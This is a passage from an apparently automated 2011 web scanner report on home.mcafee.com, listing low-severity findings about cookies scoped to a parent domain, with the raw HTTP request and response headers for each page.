Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fSiteMap.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV5
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:03 GMT
Content-Length: 74774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.10. http://home.mcafee.com/Store/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Store/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: http://home.mcafee.com/Store/Store9.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Store/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fStore%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:56 GMT
Content-Length: 0
Connection: close


13.11. http://home.mcafee.com/Store/Downloads.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Store/Downloads.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/Downloads.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Store/Downloads.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fStore%2fDownloads.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV6
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:57 GMT
Content-Length: 60299
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.12. http://home.mcafee.com/VirusInfo/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /VirusInfo/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /VirusInfo/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/VirusInfo/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fVirusInfo%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:58 GMT
Content-Length: 72983
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.13. http://home.mcafee.com/root/MyAccount.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /root/MyAccount.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/MyAccount.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://home.mcafee.com/Secure/Protected/Login.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/root/MyAccount.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2froot%2fMyAccount.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:56 GMT
Content-Length: 809
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://home.mcafee.com/Secure/Protected/Login.aspx">here</a>.</h2>
<!-- Start Home.mcafee code version --> <script
...[SNIP]...

13.14. http://home.mcafee.com/root/dynamicpage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /root/dynamicpage.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/dynamicpage.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://home.mcafee.com/Default.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/root/dynamicpage.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2froot%2fdynamicpage.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 847
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://home.mcafee.com/Default.aspx">here</a>.</h2>
<!-- Start Home.mcafee code version --> <script language="JavaSc
...[SNIP]...

13.15. http://home.mcafee.com/store/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /store/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; 